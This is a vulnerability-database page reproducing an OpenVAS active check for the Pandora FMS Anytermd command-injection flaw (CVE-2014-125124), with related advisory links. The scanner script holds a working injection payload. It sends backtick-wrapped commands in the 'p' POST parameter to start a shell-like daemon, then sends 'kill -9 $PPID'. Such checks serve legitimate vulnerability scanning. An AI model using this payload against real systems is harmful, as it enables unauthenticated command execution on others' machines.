Pandora FMS < 5.0 RCE Vulnerability - Active Check
🗓️ 30 Jan 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType
openvas🔗 plugins.openvas.org👁 9 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2014-125124 | 29 May 201815:50 | – | circl | |
| Pandora FMS 安全漏洞 | 31 Jul 202500:00 | – | cnnvd | |
| CVE-2014-125124 | 31 Jul 202515:00 | – | cve | |
| CVE-2014-125124 Pandora FMS <= 5.0RC1 Anyterm Unauthenticated Command Injection | 31 Jul 202515:00 | – | cvelist | |
| EUVD-2014-9814 | 7 Oct 202500:30 | – | euvd | |
| Pandora FMS Remote Code Execution | 29 Jan 201400:00 | – | metasploit | |
| CVE-2014-125124 | 31 Jul 202515:15 | – | nvd | |
| Kloxo SQLi and RCE Vulnerability | 22 Feb 201400:00 | – | openvas | |
| PT-2025-31544 · Undefined · Undefined | 31 Jul 202500:00 | – | ptsecurity | |
| CVE-2014-125124 | 2 Aug 202520:23 | – | redhatcve |
10
| Source | Link |
|---|---|
| packetstormsecurity | www.packetstormsecurity.com/files/124983/Pandora-FMS-5.0RC1-Code-Execution.html |
| exploit-db | www.exploit-db.com/exploits/31518 |
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:artica:pandora_fms";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103897");
script_version("2025-08-12T05:40:06+0000");
script_tag(name:"last_modification", value:"2025-08-12 05:40:06 +0000 (Tue, 12 Aug 2025)");
script_tag(name:"creation_date", value:"2014-01-30 13:13:42 +0100 (Thu, 30 Jan 2014)");
script_tag(name:"cvss_base", value:"9.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2014-125124");
script_tag(name:"qod_type", value:"remote_app");
script_tag(name:"solution_type", value:"VendorFix");
script_name("Pandora FMS < 5.0 RCE Vulnerability - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2014 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_pandora_fms_http_detect.nasl");
script_mandatory_keys("pandora_fms/http/detected");
script_require_ports("Services/www", 80);
script_tag(name:"summary", value:"Pandora FMS is prone to a remote code execution (RCE)
vulnerability.");
script_tag(name:"vuldetect", value:"Try to execute a command on the remote Host by sending some
special crafted HTTP requests.");
script_tag(name:"insight", value:"Pandora FMS 4.0.3 / 4.1 / 5.0 RC1 appliances are prone to
security vulnerabilities. The Anytermd daemon used for the SSH/Telnet gateway on TCP port
8022/8023 is vulnerable to command injection in the 'p' POST parameter, which allows any
unauthenticated attacker to execute arbitrary commands with the rights of the 'pandora' user.");
script_tag(name:"impact", value:"Successful exploits will allow remote attackers to execute
arbitrary commands within the context of the 'pandora' user.");
script_tag(name:"affected", value:"Pandora FMS version 5.0RC1 and prior.");
script_tag(name:"solution", value:"Update to version 5.0 final.");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/124983/Pandora-FMS-5.0RC1-Code-Execution.html");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/31518");
exit(0);
}
include("http_func.inc");
include("host_details.inc");
if( ! get_app_location( cpe:CPE, nofork:TRUE ) )
exit( 0 );
ports = make_list( "8022", "8023" );
host = get_host_name();
foreach port ( ports )
{
if( ! get_port_state( port ) ) continue;
rport = ( ( rand() % 65535 ) / 1024 ) + 2048;
soc = open_sock_tcp ( rport );
if( soc ) {
close (soc);
continue;
}
ex = 'a=open&p=%60/usr/bin/anytermd --port ' + rport + ' --user pandora -c %25p%60';
len = strlen( ex );
req = 'POST /anyterm-module HTTP/1.1\r\n' +
'Host: ' + host + ':' + port + '\r\n' +
'Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n' +
'Content-Length: ' + len + '\r\n' +
'\r\n' +
ex;
result = http_send_recv( port:port, data:req, bodyonly:FALSE );
if( ! result || result !~ "^HTTP/1\.[01] 200" ) continue;
soc = open_sock_tcp ( rport );
if( ! soc ) continue;
close ( soc );
req = 'GET /anyterm-module HTTP/1.1' +
'Host: ' + host + ':' + rport + '\r\n\r\n';
result = http_send_recv( port:rport, data:req, bodyonly:FALSE );
if( result =~ "^HTTP/1\.[01]" )
{
# kill our anytermd process
ex = 'a=open&p=%60kill -9 $PPID%60';
len = strlen( ex );
req = 'POST /anyterm-module HTTP/1.1\r\n' +
'Host: ' + host + ':' + rport + '\r\n' +
'Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n' +
'Content-Length: ' + len + '\r\n' +
'\r\n' +
ex;
http_send_recv( port:rport, data:req, bodyonly:FALSE );
security_message( port:port );
exit( 0 );
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 410
EPSS0.0148
SSVC